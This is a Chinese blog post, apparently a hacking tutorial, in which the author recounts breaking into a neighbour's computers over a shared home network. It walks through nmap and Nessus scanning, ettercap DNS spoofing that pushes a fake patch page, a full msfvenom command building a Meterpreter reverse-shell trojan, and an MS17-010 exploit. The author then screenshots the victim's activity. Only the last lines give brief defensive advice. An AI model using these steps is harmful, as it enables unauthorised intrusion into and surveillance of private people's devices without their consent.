0*00 前言
一直在思考,我应该写怎么样让你的青蛙变成亿万富豪,还是来一篇如何猥琐的渗透邻居小姐姐的电脑或者手机终端。
思前想后,奈何我觉得逆向破解这东西实在不适合我,还是留着那两个大佬啥时候有空来写。
0*01 信息探测
首先用外置网卡在kali内连上目标网络,查看一下本机ip
用nmap扫一下192.168.1.x c段下的目标
可以看出 除去192.168.1.1是路由器的 192.168.1.107是本机的 一共存活5台主机,其中3台为手机终端,2台为电脑终端,且都是windows系统的,我们选取两台电脑主机为目标,进一步探测。
其中192.168.1.103信息如下,从smb版本来看是一个win7
192.168.1.101那台不知为何一直没出结果,这里就不等了。不过从经验上来看估计开了防火墙和360全家桶诸如,但是没关系,我们知道它存在即可。
其中nessus扫描192.168.1.103结果如下
ms17-010,勒索病毒wannacry的本质。
0*02思路分析
一 可以尝试dns欺骗,用msf生成木马,把内网下所有流量指向我们的服务器,弹窗欺骗下载神级补丁,实际上为我们的木马。
二 又或者用beef结合msf劫持浏览器来获得shell。
三 直接拿ms17-010的exp来打win7,不过有风险,或许对方电脑会蓝屏。
0*03 dns欺骗结合msf
打开acache服务
编辑apache的index首页
vim /var/www/html/index.html
内容如下,弹出一个需要升级的补丁,实际为msf木马,我html很坑,写的简陋,凑合着用。
接下来要准备msf的木马
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.107 LPORT=4321 -f exe >tplink.exe//生成一个tcp方向连接木马 //LHOST是本机ip LPORT是端口(可自定义)
然后把木马放到我们的web根目录下
用ettercap来dns劫持
打开ettercap
选择网卡
扫描主机
选择网关
开启arp
选择工具
双击dns欺骗
开始欺骗
这样192.168.1.103这台机子在浏览器上不管访问任何网站 都会指向我们的欺骗页面。
大概是这个样子
接下里我们要在msf中设置监听,这样对方运行我们的木马的时候就能返回一个shell,当然这个木马没有免杀,可以做一些免杀的手段,我这里就不做了。
开启msf
配置msf开始监听
经过极其漫长的等待....
终于返回了shell
这时候就需要把dns欺骗撤销掉 不然她还是看不到正常的网页
让我们来看看她在干嘛
screenshot 截屏
原来是在买年货...
0*04 ms17-010
在前面的信息探测中 我们知道对方这台电脑并没有打上补丁,甚至连360都没有开启,裸机状态。
这样我们可以直接上exp
然后exploit
成功返回shell
目测这台win7是她在家里的电脑,另一台192.168.1.101的win10才是学校里的。
这里就不开她摄像头了,总得留一线,我是一个好人,为自己带盐~
0*05 总结
打开防火墙,更新补丁,不要随便运行来源不合的exe,打开不明连接。
这天气冷到我只想睡觉...
领取专属 10元无门槛券
私享最新 技术干货